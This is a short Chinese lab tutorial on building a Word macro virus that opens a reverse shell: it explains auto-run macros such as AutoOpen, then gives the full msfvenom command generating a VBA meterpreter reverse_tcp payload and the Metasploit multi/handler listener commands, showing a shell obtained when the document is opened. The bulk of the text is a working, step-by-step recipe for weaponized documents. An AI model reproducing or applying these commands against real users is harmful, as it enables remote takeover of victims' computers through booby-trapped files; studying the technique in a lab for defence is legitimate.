office宏病毒反弹shell实验

0x00 什么是宏病毒

宏病毒就是Word中被嵌入的带有恶意行为的宏代码（VBA代码），当打开带有宏病毒的word文档时，嵌入其中的宏代码会自动运行
Word 将下列名称识别为自动宏，或称“auto”宏，当相应动作被执行，会自动调用满足条件的VBA代码。

    AutoExec：启动 Word 或加载全局模板时
    AutoNew：每次新建文档时
    AutoOpen：每次打开已有文档时
    AutoClose：每次关闭文档时

0x01 简单实验环境搭建

本次实验的环境为：

win_10
word_2013
VM_kali_linux_2018（桥接模式）

首先在电脑中word信任中心设置中，打开启动所有宏选项，并信任对VBA工程对象模型的访问，以便更好的查看实验效果。

宏设置
在开发者工具中选中宏,编辑宏名称和宏位置后点击创建，进入VBA代码编辑界面。
宏创建
代码编辑界面

0x02实验开始

准备工作完成后，在kali中使用msfvenom生成一个vba类型的后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba

生成后门文件
将vba文件中的代码复制入刚刚的代码编辑界面，并保存。
查看windows主机的ip地址
ipconfig

在msf中设置本机监听：

use exploit/multi/handler #选泽监听模块
set payload windows/meterpreter/reverse_tcp  #选择生成木马相同的类型
set LHOST 192.168.1.169  #设置本机ip监听
set LPORT 6666  # 设置本机监听端口
exploit  #执行监听

当windows中打开我们生成的test.docx时，msf中接收到了来自192.168.1.249的连接。

获取shell

在windows中查看相应连接建立情况，并搜索进程，建立连接的正是winword应用程序。

netstat -ano | grep "6666"
tasklist | grep "11400"

image.png